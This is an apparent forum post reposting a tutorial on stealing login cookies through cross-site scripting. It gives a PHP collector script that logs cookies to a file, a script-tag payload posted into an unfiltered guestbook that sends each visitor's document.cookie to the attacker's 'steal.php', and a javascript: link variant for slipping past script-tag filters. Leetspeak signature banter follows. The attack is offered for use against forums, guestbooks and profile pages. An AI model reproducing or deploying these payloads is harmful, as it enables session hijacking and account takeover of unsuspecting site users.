Originally Posted by
mike*0*
That forum requires membership.
If there's any relevant discussion in that topic, feel free to repost it here so people don't have to register.
Sorry my bad.
Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
you need to have a way of sending the cookie to your script. Writing the script to accept
the cookie is the easy part, whereas finding a way to send it to your script is the hard
part. I'll show you an example of a pHp script that accepts cookies:
CODE
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
And there you have it, a simple cookiestealer. The way this script works is that it accepts
the cookie when it is passed as a variable, in this case 'cookie' in the URL, and then
saves it to a file called 'log.txt'. For example:
CODE
[url]http://yoursite.com/steal.php?cookie=[/url]
steal.php is the filename of the script we just wrote, ? lets the script know that we are
going to pass some variables to it, and after that we can set cookie equal to whatever
we want, but what we want to do is set cookie equal to the cookie from the site. This
is the second and harder part of the cookiestealer.
Most websites apply some sort of filter to input, so that you can't directly insert your
own code. XSS deals with finding exploits within filters, allowing you to put your own
code into a website. This might sound difficult, and in most cases it's not easy, but
it can be very simple.
Any website that allows you to post text potentially allows you to insert your own code
into the website. Some examples of these types of sites are forums, guestbooks, any site
with a "member profile", etc. And any of these sites that have users who log in also
probably use cookies. Now you know what sort of sites might be vulnerable to
cookiestealing.
Let's assume that we have a website that someone made. This website has user login
capability as well as a guestbook. And let's also assume that this website doesn't have
any kind of filtering on what can be put into the guestbook. This means that you can
put HTML and Javascript directly into your post in the guestbook. I'll give you an
example of some code that we could put into a guestbook post that would send the user's
cookie to out script:
CODE
<script>
document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
</script>
Now whenever someone views the page that you posted this on, they will be redirected to
your script with their cookie from this site in the URL. If you were to look at log.txt
now, you'd see the cookies of whoever looked at that page.
But cookiestealing is never that easy. Let's assume now that the administrator of this
site got smart, and decided to filter out script tags. Now you code doesn't work, so
we have to try and evade the filter. In this instance, it's easy enough:
CODE
<a href="java script:void(document.location='http://yoursite.com/steal.php?cookie='+
document.cookie)">Click Me</a>
In this case, when the user clicks on the link they will be sent to your stealer with their
cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get
around filters.
7h* L**7*57 c4n7 h4ck m*!
Proud to have quit playing ®µÑȧ©ÅÞË
If you write like a semi-literate boob you will very likely be ignored.
Writing like a l**t script kiddie hax0r is the absolute l**t*st way to write!
L0L